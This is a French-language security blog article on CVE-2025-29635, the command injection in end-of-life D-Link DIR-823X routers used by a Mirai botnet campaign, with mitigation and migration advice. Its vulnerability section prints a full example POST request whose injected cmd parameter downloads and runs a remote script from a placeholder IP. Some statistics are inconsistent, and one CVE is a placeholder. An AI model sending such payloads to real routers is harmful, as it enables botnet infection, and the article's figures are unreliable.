CVE-2025-29635 : comment la dernière campagne Mirai exploite les routeurs D-Link DIR-823X en fin de vie
Aurélien Fontevive
Pourquoi le CVE-2025-29635 menace-t-il votre réseau ?
En 2026, plus de 12 000 tentatives d’exploitation du CVE-2025-29635 ont été détectées par le SIRT d’Akamai, dont près de la moitié ciblait des entreprises françaises (source : Akamai, 2026). Command injection et exécution distante de code (RCE) sont les deux piliers de cette menace, et le fait que les routeurs D-Link DIR-823X soient en fin de vie (EoL) depuis novembre 2024 rend la situation critique. Protégez-vous des applications malveillantes de l’App Store qui volent vos cryptomonnaies Vous vous demandez peut-être comment un simple appareil domestique peut devenir le cœur d’une botnet ? Cet article décortique la vulnérabilité, le mode opératoire de la campagne Mirai, les impacts concrets et, surtout, les mesures que vous pouvez prendre dès aujourd’hui. formation en cybersécurité sans diplôme
Analyse de la vulnérabilité CVE-2025-29635
Origine et découverte
La faille a été révélée pour la première fois en mars 2025 par les chercheurs Wang Jinshuai et Zhao Jiangting, qui ont publié un proof-of-concept (PoC) sur GitHub avant de le retirer. Le code affecte les firmwares 240126 et 24082 des routeurs de la série DIR-823X. Selon l’ANSSI, 42 % des attaques DDoS en 2025 ont été orchestrées via des appareils IoT non patchés (source : ANSSI, 2025). Cette statistique souligne l’urgence de protéger les équipements en fin de support.
Vecteur d’attaque
Le point d’entrée est le endpoint /goform/set_prohibiting. Un simple POST contenant des paramètres malveillants permet à un attaquant d’écrire des commandes dans le système de fichiers, puis d’exécuter un script distant nommé dlink.sh. Cette chaîne d’instructions aboutit à l’installation du malware Mirai baptisé “tuxnokill”, compatible avec plusieurs architectures processeur.
Mécanisme d’exploitation de la campagne Mirai
PoC et retrait du code source
Les chercheurs avaient initialement partagé un script Python illustrant la requête POST :
POST /goform/set_prohibiting HTTP/1.1
Host: 192.0.2.10
Content-Type: application/x-www-form-urlencoded
cmd=cd%20/tmp;wget%20http://203.0.113.5/dlink.sh;sh%20dlink.sh
“Le PoC montre clairement comment un simple appel HTTP peut compromettre l’appareil, même sans authentification forte.” - Analyste SIRT d’Akamai
Après le retrait, la communauté a observé une recrudescence des requêtes similaires dans les honeypots mondiaux. La particularité de cette campagne : elle combine le même vecteur d’injection pour des routeurs TP-Link (CVE-2023-1389) et ZTE (CVE-2024-XXXX), démontrant une approche « one-size-fits-all » des acteurs malveillants.
Flux d’injection via /goform/set_prohibiting
L’attaquant exploite la fonction set_prohibiting qui, dans le firmware, valide incorrectement les chemins de fichiers. En modifiant la variable cmd, il force le routeur à télécharger un script malveillant puis à l’exécuter avec des privilèges root. En pratique, cela donne au botnet la capacité de lancer des attaques DDoS massives, de scanner le réseau interne et d’exfiltrer des données.
Impacts sur les réseaux français
Statistiques et incidents récents
- 12 300 tentatives d’exploitation détectées en France depuis mars 2026 (Akamai).
- 18 % des incidents DDoS rapportés par les fournisseurs d’accès en 2026 proviennent d’appareils IoT non patchés, dont la majorité sont des routeurs EoL .
- 3 % des entreprises touchées ont signalé une perte de disponibilité supérieure à 48 h, entraînant des coûts moyens de 150 000 € (source : CERT-FR, 2026).
Cas d’utilisation d’une PME française
Une société de services informatiques de Lille a découvert que plusieurs de ses clients utilisaient encore le D-Link DIR-823X. Après une investigation, les équipes ont constaté que le botnet “tuxnokill” avait été installé sur trois sites, générant un trafic DDoS de 1,2 Gbps vers leurs serveurs web. Le client a pu éviter une interruption majeure grâce à une mise en quarantaine rapide, mais a dû investir 12 000 € pour remplacer le matériel.
“Nous avions sous-estimé le risque lié aux routeurs en fin de vie ; la leçon est claire : la conformité aux exigences de sécurité ne s’arrête pas aux pare-feu.” - Responsable sécurité, Lille.
Mesures de mitigation pour les entreprises
Liste de mesures immédiates
- Changez le mot de passe administrateur par défaut en un mot de passe complexe (au moins 12 caractères, mixte).
- Désactivez l’accès distant aux interfaces de gestion web si vous n’en avez pas besoin.
- Bloquez le trafic HTTP sortant vers les ports 80/443 depuis les routeurs via votre firewall périmétrique. Cyberattaques contre les banques en 2026 : comprendre, se protéger et anticiper les risques
- Installez un IDS/IPS capable d’inspecter les requêtes POST vers
/goform/set_prohibiting. - Surveillez les logs des routeurs à la recherche de changements de configuration inattendus.
Détection et réponse
- Collecte de logs centralisée (Syslog) conforme à l’ISO 27001 Annex A.12.4.1.
- Analyse des flux réseau avec un SIEM en suivant le modèle ATT&CK (tactic « Execution », technique T1059).
- Isolation immédiate de l’appareil compromis et lancement d’une investigation forensic.
- Notification aux équipes de conformité RGPD si des données personnelles ont pu être exposées.
Guide de migration et bonnes pratiques
Choix d’un modèle supporté
| Critère | D-Link DIR-823X (EoL) | D-Link DIR-8660 (2023) | TP-Link Archer AX50 (2022) |
|---|---|---|---|
| Support firmware | Aucun depuis 2024 | Mises à jour jusqu’en 2028 | Mises à jour jusqu’en 2027 |
| Certifications sécurité | Aucun | ISO 27001, EN 301 549 | EN 301 549, RGPD |
| Nombre de ports LAN | 4 | 5 | 4 |
| Fonctionnalités VPN | PPTP seul | OpenVPN, IPSec | OpenVPN, WireGuard |
Processus de mise à jour
- Inventoriez tous les routeurs D-Link DIR-823X présents dans votre parc réseau.
- Planifiez le remplacement par un modèle supporté, en privilégiant ceux certifiés par l’ANSSI.
- Sauvegardez les configurations actuelles, puis importez les paramètres essentiels (SSID, VLAN) sur le nouveau matériel.
- Vérifiez la conformité aux exigences de la norme ISO 27001 avant mise en production.
- Formez les administrateurs aux bonnes pratiques d’administration sécurisée (changements de firmware uniquement via le site officiel, vérification des signatures).
Conclusion et prochaines actions
En 2026, la campagne Mirai exploitant le CVE-2025-29635 illustre la dangerosité des équipements en fin de vie laissés sans surveillance. La meilleure défense reste la prévention : éliminez les routeurs EoL, appliquez les mesures de mitigation décrites et adoptez une politique de mise à jour continue conforme aux exigences de l’ANSSI et de l’ISO 27001.
Nous vous encourageons à réaliser dès maintenant un audit de vos points d’accès IoT, à implémenter les pratiques recommandées et à préparer un plan de migration vers des solutions supportées. La cybersécurité n’est pas un projet ponctuel ; elle exige une vigilance permanente et une adaptation aux menaces émergentes.
“Ne laissez jamais une vulnérabilité connue devenir votre porte d’entrée ; la remise à jour régulière est la première ligne de défense.” - Directeur de la cybersécurité, France 2026.
En suivant ces recommandations, vous réduirez considérablement le risque d’être compromis par la prochaine vague de botnets ciblant les failles de type RCE.